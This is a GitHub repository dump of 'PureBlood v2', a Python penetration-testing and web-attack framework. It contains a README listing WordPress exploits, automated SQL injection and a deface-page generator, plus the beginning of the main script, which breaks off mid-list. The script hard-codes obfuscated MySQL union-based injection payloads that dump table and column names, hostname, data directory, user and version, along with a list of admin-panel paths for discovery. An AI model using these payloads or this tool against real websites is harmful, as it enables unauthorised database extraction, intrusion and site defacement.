├── .gitignore ├── LICENSE ├── README.md ├── imgs ├── PureBlood LOGO.png └── banner.jpg ├── l33t ├── rfi.txt ├── ver.txt └── wot.txt ├── pureblood.py └── requirements.txt /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | MANIFEST 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | .pytest_cache/ 49 | 50 | # Translations 51 | *.mo 52 | *.pot 53 | 54 | # Django stuff: 55 | *.log 56 | local_settings.py 57 | db.sqlite3 58 | 59 | # Flask stuff: 60 | instance/ 61 | .webassets-cache 62 | 63 | # Scrapy stuff: 64 | .scrapy 65 | 66 | # Sphinx documentation 67 | docs/_build/ 68 | 69 | # PyBuilder 70 | target/ 71 | 72 | # Jupyter Notebook 73 | .ipynb_checkpoints 74 | 75 | # pyenv 76 | .python-version 77 | 78 | # celery beat schedule file 79 | celerybeat-schedule 80 | 81 | # SageMath parsed files 82 | *.sage.py 83 | 84 | # Environments 85 | .env 86 | .venv 87 | env/ 88 | venv/ 89 | ENV/ 90 | env.bak/ 91 | venv.bak/ 92 | 93 | # Spyder project settings 94 | .spyderproject 95 | .spyproject 96 | 97 | # Rope project settings 98 | .ropeproject 99 | 100 | # mkdocs documentation 101 | /site 102 | 103 | # mypy 104 | .mypy_cache/ 105 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 Jerald Dale 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

Pure Blood

2 | 3 |

4 | PureBlood Material Logo 5 |

6 | 7 |
8 | 9 | [![License](https://img.shields.io/badge/Licenese-MIT-blue.svg?longCache=true&style=flat)](https://github.com/cr4shcod3/pureblood/blob/master/LICENSE) [![Compatible](https://img.shields.io/badge/Compatible%20On-Any-yellowgreen.svg?longCache=true&style=flat)](https://en.wikipedia.org/wiki/Operating_system) [![Python2x](https://img.shields.io/badge/Python-2x-brightgreen.svg?longCache=true&style=flat)](https://www.python.org/downloads) [![Python3x](https://img.shields.io/badge/Python-3x-brightgreen.svg?longCache=true&style=flat)](https://www.python.org/downloads) 10 | 11 | # Pure Blood v2 12 | 13 | > A Penetration Testing Framework created for Hackers / Pentester / Bug Hunter 14 | 15 | # Menu 16 | 17 | ### Web Pentest / Information Gathering: 18 | - Banner Grab
19 | - Whois
20 | - Traceroute
21 | - DNS Record
22 | - Reverse DNS Lookup
23 | - Zone Transfer Lookup
24 | - Port Scan
25 | - Admin Panel Scan
26 | - Subdomain Scan
27 | - CMS Identify
28 | - Reverse IP Lookup
29 | - Subnet Lookup
30 | - Extract Page Links
31 | - Directory Fuzz (NEW)
32 | - File Fuzz (NEW)
33 | - Shodan Search (NEW)
34 | - Shodan Host Lookup (NEW) 35 | #### Web Application Attack: (NEW) 36 | - Wordpress
37 |     | WPScan
38 |     | WPScan Bruteforce
39 |     | Wordpress Plugin Vulnerability Checker
40 |         Features: // I will add more soon.
41 |         | WordPress Woocommerce - Directory Craversal
42 |         | Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting
43 |         | WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
44 |         | WordPress Plugin Events Calendar - 'event_id' SQL Injection
45 | - Auto SQL Injection
46 |     Features:
47 |     | Union Based
48 |     | (Error Output = False) Detection
49 |     | Tested on 100+ Websites 50 | ### Generator: 51 | - Deface Page
52 | - Password Generator // NEW
53 | - Text To Hash //NEW
54 | 55 | # Author's Words: 56 | This project is managed / enhanced everyday and sorry if it takes a while before another version is published. Well, I'm the only one who is managing this and also I have personal daily activities. This tool is for everyone. So please open an issue if you run into a bug. Well I can only test it in Windows and Kali Linux since that's the only device I have. Also please try the new AUTO SQL Injection that I'm proud of currently. I created a video already on how I created it. Check it out on my Youtube Channel. The WPScan is also checked for Windows and Kali Linux. If you are using other Linux Distro please add wpscan in your ~/.bashrc. 57 | 58 | # Installation 59 | 60 | > Any Python Version. 61 | 62 | ``` 63 | $ git clone https://github.com/cr4shcod3/pureblood 64 | $ cd pureblood 65 | $ pip install -r requirements.txt 66 | ``` 67 | 68 | # DEMO 69 | 70 | ## Web Pentest 71 | [![asciicast](https://asciinema.org/a/193579.png)](https://asciinema.org/a/193579) 72 | 73 | ## Web Application Attack 74 | [![asciicast](https://asciinema.org/a/193578.png)](https://asciinema.org/a/193578) 75 | 76 | # Build With 77 | * [Colorama](https://pypi.org/project/colorama) 78 | * [Requests](https://github.com/requests/requests) 79 | * [Python-whois](https://pypi.org/project/python-whois) 80 | * [Dnspython](http://www.dnspython.org) 81 | * [BeautifulSoup](https://www.crummy.com/software/BeautifulSoup) 82 | * [Shodan](https://shodan.readthedocs.io/en/latest/) 83 | 84 | ## Contributing 85 | Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change. You can also suggest a feature, just open an issue.
86 | You can also:
87 | [![Buy me a coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://www.buymeacoffee.com/f4a5kJcyl) 88 | 89 | ## Authors 90 | * [Cr4sHCoD3](https://www.facebook.com/cr4shcod3.py) - Pure Blood 91 | 92 | ## License 93 | This project is licensed under the [MIT License](https://choosealicense.com/licenses/mit) - see the [LICENSE](https://github.com/cr4shcod3/pureblood/blob/master/LICENSE) file for details 94 | -------------------------------------------------------------------------------- /imgs/PureBlood LOGO.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ChesZy2810/https-github.com-cr4shcod3-pureblood/2c5ce07feea7e4f5a46aeba6140414544244d47f/imgs/PureBlood LOGO.png -------------------------------------------------------------------------------- /imgs/banner.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ChesZy2810/https-github.com-cr4shcod3-pureblood/2c5ce07feea7e4f5a46aeba6140414544244d47f/imgs/banner.jpg -------------------------------------------------------------------------------- /l33t/rfi.txt: -------------------------------------------------------------------------------- 1 | PureBlood RFI ~Cr4sHCoD3 2 | -------------------------------------------------------------------------------- /l33t/ver.txt: -------------------------------------------------------------------------------- 1 | 2 2 | -------------------------------------------------------------------------------- /l33t/wot.txt: -------------------------------------------------------------------------------- 1 | iVBORw0KGgoAAAANSUhEUgAAAfQAAABkCAIAAAD/pVUqAAATSElEQVR4nO3ce1hN2f8H8LVPKV2ojkPuSkbhJJW73D3TEIPHyLjLnWkehpCZ7+ORDGYMxu2ZCYkKKRoMk1shVJ6KQ6cnIpcaTqWj2+l+av3+WGbPnnNzXGbM+L1f/zh77bXX/qy991mtvdY6CCEcRzhCXv7LEcKxBI5wHPdyk+1m+1kiIewfTng4YUe9LOuPnXy+P4778+CXSURQJHl5tpfpL6MQBMLxOV7uIhx/PF8Y+Wt5HBGcmo/0ZXXJn5V4WZqwMCKoAfkzH/mzNP6EnI50TlCm4GQvr+4fdQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAd8HLy4tSOmzYsL/1LKamppTScePGvX1R76ocA65du0a1BAYGEkLy8/PXr1+v78CWLVuq1eo7d+5o7+I4bvbs2YmJiUqlsrq6+u7du999951YLBbmGTduXGFh4ZEjRwzEMHr0aO30yMhIYTkSiYRS+tlnnxkTm52d3b59+xQKhVKpDAsLs7OzI4RERkZqn4VS+uDBA8MXYcmSJQ8fPqysrLx+/bqHhwdL9PT01CjHy8vLQH6dIRFCZDKZdkgqlYrtlcvlwvSqqqp79+6tWLGCj00ul//8888aAaelpR04cOC1bhMzfPjwhoYGqVTKp8yfPz89Pb2ysrKsrOzatWu+vr4s/fLlyzdu3NAu4cqVK6dOnWI3S9u+ffu0w9OO2XCtnZycVCrVrl27hId7e3ur1ephw4YZvssGasrofMwIIXv27OGv85EjRwoLC318fLSrD3+76OjoQ4cOnTx58m89y3+ucY+KitK5y3DjvmLFihs3bqjV6n79+gnTOY6LjY3Nzc319fW1tbU1Nzf38vJKSUnJzMy0tLTks+Xl5fn7+4tEIsMxCM2dO1elUnXt2lWYqPNbpy+2S5cuZWRkuLq6SiSSiIiItLQ0ExMTfm/btm21L7i+i7BkyZLS0tIRI0bY2Njs3LlToVDY2NgQQmbOnPnw4UPj8+sLSSaTsSZPJ422WywWBwQEUEqnTp2qMwMjbCiNvE2EEDs7u7y8PEop3+QFBAQUFhZ6e3tbW1uLxeK5c+fW1dXNmjWLVZ9S+tFHHwlLcHR0bGhoGD9+vHZFFi9erFarBw8eTIxr3A3XesGCBQ0NDUOGDGGbEolEoVB8//33wgJ13mV9NeVpP2Ycx61bt45SyockEokWLFhw//597ZLh79WuXbsXL17Y2NgUFhZ27Njx7zvR/5PGXS6XBwUFXb16VeML6e/vX11d3blzZ2GiWCwuKyvz8/Njm40bN6aUurm5vTIGXrt27VQq1eLFizXSdTbuOmPz8PCglPLNvaWlZWlpqfDyGt+4N2rUqKio6Msvv2Sb5ubmKpVq0qRJhJDNmzefOXPGyPwGQnqtxp1JTU09deqUgQzChtKY28RERUUlJycLm7zs7Ozg4GBhntDQUJlMRgixsrIqLy8PCgoS7g0KCiooKGjUqJFGPI6OjuXl5f/73/+0w9MZ8ytrTQg5c+ZMTk6OlZUVIeTkyZPp6elmZmbC/AYad+2a8jQeMwcHh4SEBKVS+fjxY2FIbm5ulFKNM34wRO87AL2++OKLX3/9tbS09Pjx4/7+/uSPVnjx4sUZGRlVVVU3btzo378/IcTa2ppS+sknn7AD2eaIESNYk7Rp06aCgoK8vLymTZs2bdo0JCTk+fPnJSUlFy5c6NGjB386T0/PxMRElUqVk5Mzbdo0ljhw4MDz588/ffq0trb28ePHbPSDEGJra7t3797nz5+rVKrExMQ+ffpoBO/i4qJQKA4ePMi6ujrPqx2er6+vXC6vrKy8d+/e9u3bGzdu/K4uZq9evbp163b69Ono6GjW9eN3+fv7R0REZGdnC/O/ePHCyckpLCyMbVpYWBBCamtrjT/jhg0bHjx4EBIS8saxOTk5EULS09PZZmVl5ePHjwcNGmR8DDxPT89mzZpFR0ezzZqaGmtr66NHjxJCpFJpVlaWkfnfYUiEEBMTk7q6OiMzG3ObCCHTpk3r27fvkiVLhNlqamoGDRok7ODPmTOHPYQVFRUxMTF8V5oQwnHc9OnTIyMjNWIzMzOLjo5OTk7esGGDsTXURaPWc+fOtbGx2bp165IlS0aMGDFlyhQjHzOdNdWnT58+T548cXV11RjVqa+vJ4S8wy/av8q/tHG3sLCYO3fu4cOHCSGRkZGzZ8+2trZmu9avXx8YGNi6deuEhIQLFy506NDBcFFjxoyRSqU+Pj5lZWWHDh3q2LFjv379HBwc4uPjExMT27Vrx7LNmTMnMDDQ3t7+8OHDYWFhrVu3FovFv/3228WLF52dnSUSyYEDBzZu3Ojq6koIOXHiRPfu3QcOHOjg4BAXF3f+/Hn2zs64uLhcunTp/Pnzfn5+DQ0NhBAD5+XDk0gkhw8fXrlypZ2d3dixY8eNG8f3HN/erFmzcnNzU1NTY2NjGzduPH36dJbeokULZ2fnK1euaB/y/Plz/rO5uTkhxPiWqFOnTlOmTAkODmZfnjeLLS8vjxDCv7SZm5u3b9++RYsWRsYg1Llz59LSUqlUevPmzYqKiuTkZP7vsVQq9fT0zM7OVqlUycnJAwcONJD/XYUkFotXrVrl7u4eERFhTH4jb1OHDh127NgxY8aMsrIyYZ6goKABAwb8/vvvERERs2bNatu2rXBvWFiYk5MT/zoyZMgQR0fH/fv3a5xo69atbdq0mTZtGnuk34DOWisUikWLFs2fP3/Lli1fffXVvXv3jClKX031OXr0qJ+f37NnzzTSq6qqyB+PN/xD5s2bV1BQwA+w5uTk+Pv7s547/1YoEonY+6bhnvvy5ctZOnun5ltVQkhqauq3337LiuWzNW3alFI6atQojZBsbGwopR9//HGPHj0opcJeP49SGhgYqFAowsPDWZ/dwHk1whs6dGhDQwMbzTRAezLzxIkTbJe+YRkzMzOlUrlt2za2mZSUlJGRwT67urpSSkeOHMlnFk4MXrx4kSVKpdL6+vomTZq8Mgbmxx9/zMnJ4a+AkMb7soHYRCJRamrq1atXO3Xq1KxZs7179yqVSr43TV5nWMbf37+ioiI1NdXNzc3W1nbjxo3l5eXt27dn9zo8PNze3l4ikWzdurW6uloqlerLbyAknROqP/zwAwtAY2qxvr4+NTWVjQvxGQwMyxhzm0Qi0eXLlzdt2kQIcXFx0Ris6NGjx969e589e0YpbWhoiIuLE/aK7t+/v3v3bvb54MGD2lOsvr6+/FC7MDztKlNK9U2oateasbGxefHiRV1dnc7RV+27bLimjL4J1YsXLwqvs7W1tVqt7tKli/Z5PwD/0p773r177e3t+X6fk5MTP6t+/fp19qGhoeHWrVvdu3c3XNTjx4/ZB9bpzs3N5Z+2nj178veVz8b6AmwgwtzcfPLkyZs3bz5x4gRrdEQikVQq1bfshBCyYcMGe3v73NxcvoNj5HmvXr0aExNz+fLlBw8e7N69m59l0nb06FFO4JWj/GPHjhWLxbGxsWzz2LFjUqmUjWgplUpCCL/kgxDSo0cPViwbtWAXYfny5WfOnCkvLzcmBpFINHny5IiICGO6eAZia2ho+PTTTwsKCtLS0m7duiWXy5OTk0tLS19Zpra6ujpLS8tVq1bdvn27pKTk66+/Ligo8PPzKysr4zhuxowZBQUFRUVFy5cvf/jw4cKFC/XlNxxSaGgo91cBAQF8DCEhIRzHmZqaTp48uby8fPfu3fwVZhFq/y0UiUTsbcmY2xQQEGBjY7NmzRqdV0Amk82bN69169Zdu3b95ptv+vfvHxcXx3eeDhw44Ovr26hRI2tr6wkTJgjHeQghnTt33rdv39q1a7VfHQ4ePKhRZX7Mypha83lUKlVhYaGwS2SA4Zq+FpVKderUqeXLl3+QnXfT9x3Aa1Or1fxnExMTtVpNKRVmMDX9S6Vqamr49NraWisrK2EJfH6NAQSO42xtbZOSkkxNTU+cOHHs2LG1a9feunWLvGp0IioqKj4+/qeffoqJibl9+7aB87KRPj48tVo9adKk4ODgkSNHjho1KiEhYf369e/kCWbrIhITE4WJ8+fPT0pKUigUjx49GjBgABsB02nLli2jR4/u2bOnkafr06dPixYtjh07ZiAPfykMxEYIUSgUws7XokWLrl27ZmQYQk+fPiWE8K/8lNKcnBwHBweNbJTSBw8etGnT5uzZs/ryv2VI9fX1UVFRFhYWoaGh5eXlx48fZ+nFxcX8ixGPdWnZSV95m6ZMmeLm5sY/ToSQjIyMgwcPsivMy8rKysrKevjwYVRUlIuLS2ZmJiEkPDx83bp13t7eEolEJBKxBa+MhYVFTExMSkrK2wy166s1IWTOnDm+vr6jRo0yMTE5ffr0qlWrNm7caLg0I2tK/tpW6LN06dL09PTq6mo2sfch+Zf23A1wd3dnH0Qikbu7e3p6Omtt2YQ7IUT7S8tkZmaamZnxq5hfacyYMc7Ozn369Fm5cmVkZCRbPMBxXFZWlqmpabdu3XQeFR0dHRoampSUFBoaynpGr3VeuVy+efPmoUOHbtmyRfthfQMtW7b09vZevXq1sHsVGRnJpi4ppWzskk0V8kQiUcuWLdnnZcuWRUVFaSxXN2DAgAFFRUVyuZxPWbZsGd/pY5MTbKTYcGw2Njb19fV9+/ZlB3bp0sXZ2fnChQtvcBFSUlLUarWnpyfbNDExcXFxuX///uDBgyml/BIUU1PT7t27Z2Zm6sv/rkIKCwuLi4sLDw/nx0bS09N79uwp7Lfa29s7ODikpqYSQoy5TXxfnuM49l7o6uo6a9as/v37U0o15vzv3r1LKWUvBISQvLy8+Pj4iRMnfv7557GxscLXo127djVv3vxthtoN1NrFxWXHjh3bt28/e/bsmTNnQkJCgoKCdA54Cumrqb7HzLDo6OjIyMhly5a9TdXgbbHBcYVC4eXlZWdnt3nzZqVSaW9vTwhJS0s7e/Zss2bNHB0dL126pFar+TH30aNH8yVcvHgxKyvLw8OjadOmPj4+JSUlc+bM0V4KyUbrfHx8KKXjx483Nzfv3bt3ZmYmpXTChAmEkLi4uKtXrzo5OVlYWEydOrW2tpZ96/hynJ2da2pqVq5caeC8GuGNHz++tLR00KBBZmZm7du3T0pKiomJ0b4Ir7sUcsWKFXV1dXwTwPTt25dSyiZsOY47fPhwfn7+zJkzmzdvbmlpOWzYsMTExIqKCn4RRadOnSilzZs3f2UMhJCIiIjz588LU3x8fOrq6oYOHSoWi0NCQgoKCthb8Ctj++WXX86dOyeRSDp27Hjnzh1hj4+85jr3nTt35uTkeHh42Nrabtu2rbi4uFWrVo0aNZLJZAkJCWxedN++fUqlkk2Q6sxvIKTXXQrZoUMHlUp1+vRptung4FBWVrZnz5727dtbWFi4u7tfunTpzp07/HpEY24TTzgSzXFcfHx8ZmbmmDFjWrdubWVl5e7uHhcXp7GQafLkySUlJbW1tcLfDM6YMYNS6u3trbNSb7AUUlhrc3NzmUwmk8n4IRErK6vs7Gy5XC5cvmJgKaRGTfU9ZkIaY+6tWrWilDo6OuosHP45rBXeunWrTCarqKhISEhgw9mEEHd396SkpJqampycnOnTp+fn5+ts3MVi8f79+4uKiqqrqzMzMxcuXEh0rXPnp2KCg4Pz8/PLy8tTUlKmTJly8+ZN9guLZs2ahYeHFxcXq1Sq69evDx8+nD+QL2ft2rWVlZXs5yE6z6sd3tKlS+/du1ddXV1UVLR//35+jDUyMpJfwmW4cdeY2pLJZHK5nB/RFkpPTxd2ridOnHju3LnCwsLq6urs7Oxt27YJZ4CbN29OKXVxcXllDISQ+Pj40NBQjcTVq1c/efKkqqoqJSWld+/eLPGVsUkkkqioqJKSkvz8/G3btmksWdPXuGtfBEKIiYlJcHDw06dPq6qqEhMT+fe/Nm3aHDp0qLCwsKKi4ty5c/zUnL78+kLSOaHK5leInvlS9osefpBHKpXGxsYWFBTU1NTk5ubu3r1b+9enhm8TT2Oa0dLScs2aNbdv31apVNXV1XK5fNmyZRqjl40bNy4uLn706BHHcXzi6dOndVYqLS2NvOk6d77WO3furKys1JjM7N27d11dHT/BTl6ncSd6HjMhjca9S5culFLhZAa8H+/w10bwWpo0aUIp5f+UAnwY2DIk7dmOD8N/b8wd/nnl5eVKpdLT01PYrQP4TxOJRL169VIqlfx/AQTvDXru79H06dOVSqVwHQXAf9qRI0eUSuXs2bPfdyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8C/wcXFc1BSTJ2fQAAAABJRU5ErkJggg== 2 | -------------------------------------------------------------------------------- /pureblood.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | """ 4 | Script Created By: 5 | Cr4sHCoD3 6 | Github: 7 | https://github.com/cr4shcod3 8 | FB Page: 9 | https://facebook.com/cr4shcod3.py 10 | Youtube: 11 | https://www.youtube.com/channel/UCEw5DaWEUY0XeUOTl1U2LKw 12 | Buy Me A Coffee: 13 | https://www.buymeacoffee.com/f4a5kJcyl 14 | Google Plus: 15 | https://plus.google.com/u/0/115239095310355713855 16 | Copyrights: 17 | Cr4sHCoD3 2018 18 | MIT LICENSE 19 | Special Mentions: 20 | PureHackers PH 21 | Blood Security Hackers 22 | """ 23 | 24 | 25 | import os 26 | import sys 27 | import platform 28 | import time 29 | import datetime 30 | import re 31 | import threading 32 | import socket 33 | import webbrowser 34 | import hashlib 35 | import random 36 | import subprocess 37 | import zipfile 38 | 39 | 40 | 41 | if sys.version_info[0] == 3: 42 | from urllib.parse import urlparse 43 | elif sys.version_info[0] == 2: 44 | from urlparse import urlparse 45 | 46 | 47 | 48 | try: 49 | import colorama 50 | colorama.init() 51 | except: 52 | print ('[!] - Module (colorama) not installed!') 53 | sys.exit() 54 | 55 | 56 | 57 | try: 58 | import requests 59 | from requests.exceptions import ConnectionError 60 | except: 61 | print ('[!] - Module (requests) not installed!') 62 | sys.exit() 63 | 64 | 65 | 66 | try: 67 | import whois 68 | except: 69 | print ('[!] - Module (python-whois) not installed!') 70 | sys.exit() 71 | 72 | 73 | 74 | try: 75 | import dns.resolver 76 | except: 77 | print ('[!] - Module (dnspython) not installed!') 78 | sys.exit() 79 | 80 | 81 | 82 | try: 83 | from bs4 import BeautifulSoup 84 | except: 85 | print ('[!] - Module (bs4) not installed!') 86 | sys.exit() 87 | 88 | 89 | 90 | try: 91 | import shodan 92 | except: 93 | print ('[!] - Module (shodan) not installed!') 94 | sys.exit() 95 | 96 | 97 | 98 | ######################################################################################################################################################### 99 | # GLOBAL 100 | 101 | FNULL = open(os.devnull, 'w') 102 | google_hacking = 'https://www.google.com/search?q=' 103 | dios1 = '(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(InFoRMAtiON_sCHeMa.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c7374726f6e672069643d2250757265426c6f6f64223e5461626c653a20,TaBLe_nAMe,0x203d3d20,column_name,0x3c2f7374726f6e673e3c62723e))))a)' 104 | sqli_payload_hostname = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@hostname,0x3c2f7374726f6e673e)' 105 | sqli_payload_tmpdir = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@tmpdir,0x3c2f7374726f6e673e)' 106 | sqli_payload_datadir = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@datadir,0x3c2f7374726f6e673e)' 107 | sqli_payload_version = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@version,0x3c2f7374726f6e673e)' 108 | sqli_payload_basedir = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@basedir,0x3c2f7374726f6e673e)' 109 | sqli_payload_user = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,user(),0x3c2f7374726f6e673e)' 110 | sqli_payload_database = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,database(),0x3c2f7374726f6e673e)' 111 | sqli_payload_schema = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,schema(),0x3c2f7374726f6e673e)' 112 | sqli_payload_uuid = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,UUID(),0x3c2f7374726f6e673e)' 113 | sqli_payload_system_user = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,system_user(),0x3c2f7374726f6e673e)' 114 | sqli_payload_session_user = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,session_user(),0x3c2f7374726f6e673e)' 115 | sqli_payload_symlink = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@GLOBAL.have_symlink,0x3c2f7374726f6e673e)' 116 | sqli_payload_ssl = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@GLOBAL.have_ssl,0x3c2f7374726f6e673e)' 117 | sqli_dump_column_payload = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,,0x3c2f7374726f6e673e)' 118 | 119 | ## Color 120 | reset = '\033[0m' 121 | bold = '\033[1m' 122 | underline = '\033[4m' 123 | ### Fore 124 | black = '\033[90m'; red = '\033[91m'; green = '\033[92m'; yellow = '\033[93m'; blue = '\033[94m'; magenta = '\033[95m'; cyan = '\033[96m'; white = '\033[97m' 125 | ### Background 126 | bg_black = '\033[90m'; bg_red = '\033[91m'; bg_green = '\033[92m'; bg_yellow = '\033[93m'; bg_blue = '\033[94m'; bg_magenta = '\033[95m'; bg_cyan = '\033[96m'; bg_white = '\033[97m' 127 | 128 | ## Configuration 129 | if platform.system() == 'Windows': 130 | from ctypes import windll, create_string_buffer 131 | h = windll.kernel32.GetStdHandle(-12) 132 | csbi = create_string_buffer(22) 133 | res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi) 134 | if res: 135 | try: 136 | import struct 137 | (bufx, bufy, curx, cury, wattr, 138 | left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw) 139 | sizex = right - left + 1 140 | sizey = bottom - top + 1 141 | except: 142 | print("[!] - Module (struct) not installed!") 143 | else: 144 | sizex, sizey = 80, 25 145 | elif platform.system() == 'Linux' or platform.system() == 'Darwin': 146 | sizey, sizex = os.popen('stty size', 'r').read().split() 147 | else: 148 | sizex = 50 149 | 150 | ## Date Time 151 | month = datetime.date.today().strftime("%B") 152 | if datetime.date.today().strftime("%w") == 1 or datetime.date.today().strftime("%w") == '1': 153 | day = 'Monday' 154 | elif datetime.date.today().strftime("%w") == 2 or datetime.date.today().strftime("%w") == '2': 155 | day = 'Tuesay' 156 | elif datetime.date.today().strftime("%w") == 3 or datetime.date.today().strftime("%w") == '3': 157 | day = 'Wednesday' 158 | elif datetime.date.today().strftime("%w") == 4 or datetime.date.today().strftime("%w") == '4': 159 | day = 'Thursday' 160 | elif datetime.date.today().strftime("%w") == 5 or datetime.date.today().strftime("%w") == '5': 161 | day = 'Friday' 162 | elif datetime.date.today().strftime("%w") == 6 or datetime.date.today().strftime("%w") == '6': 163 | day = 'Saturday' 164 | elif datetime.date.today().strftime("%w") == 7 or datetime.date.today().strftime("%w") == '0': 165 | day = 'Sunday' 166 | mday = datetime.date.today().strftime("%d") 167 | year = datetime.date.today().strftime("%Y") 168 | current_datetime = datetime.datetime.now() 169 | current_time = current_datetime.strftime('%I:%M:%S') 170 | 171 | ## List 172 | ids = [ 173 | 'NONE','A','NS','MD','MF','CNAME','SOA','MB','MG','MR','NULL','WKS','PTR','HINFO','MINFO','MX','TXT','RP','AFSDB','X25','ISDN','RT','NSAP','NSAP-PTR','SIG','KEY','PX','GPOS','AAAA','LOC','NXT','SRV','NAPTR','KX','CERT','A6','DNAME','OPT','APL','DS','SSHFP','IPSECKEY','RRSIG','NSEC','DNSKEY','DHCID','NSEC3','NSEC3PARAM','TLSA','HIP','CDS','CDNSKEY','CSYNC','SPF','UNSPEC','EUI48','EUI64','TKEY','TSIG','IXFR','AXFR','MAILB','MAILA','ANY','URI','CAA','TA','DLV' 174 | ] 175 | admin_panel_list = ['/admin.aspx','/admin.asp','/admin.php','/admin/','/administrator/','/moderator/','/webadmin/','/adminarea/','/bb-admin/','/adminLogin/','/admin_area/','/panel-administracion/','/instadmin/','/memberadmin/','/administratorlogin/','/adm/','/admin/account.php','/admin/index.php','/admin/login.php','/admin/admin.php','/admin/account.php','/joomla/administrator','/login.php','/admin_area/admin.php','/admin_area/login.php','/siteadmin/login.php','/siteadmin/index.php','/siteadmin/login.html','/admin/account.html','/admin/index.html','/admin/login.html','/admin/admin.html','/admin_area/index.php','/bb-admin/index.php','/bb-admin/login.php','/bb-admin/admin.php','/admin/home.php','/admin_area/login.html','/admin_area/index.html','/admin/controlpanel.php','/admincp/index.asp','/admincp/login.asp','/admincp/index.html','/admin/account.html','/adminpanel.html','/webadmin.html','webadmin/index.html','/webadmin/admin.html','/webadmin/login.html','/admin/admin_login.html','/admin_login.html','/panel-administracion/login.html','/admin/cp.php','cp.php','/administrator/index.php','/administrator/login.php','/nsw/admin/login.php','/webadmin/login.php','/admin/admin_login.php','/admin_login.php','/administrator/account.php','/administrator.php','/admin_area/admin.html','/pages/admin/admin-login.php','/admin/admin-login.php','/admin-login.php','/bb-admin/index.html','/bb-admin/login.html','/bb-admin/admin.html','/admin/home.html','/modelsearch/login.php','/moderator.php','/moderator/login.php','/moderator/admin.php','/account.php','/pages/admin/admin-login.html','/admin/admin-login.html','/admin-login.html','/controlpanel.php','/admincontrol.php','/admin/adminLogin.html','/adminLogin.html','/a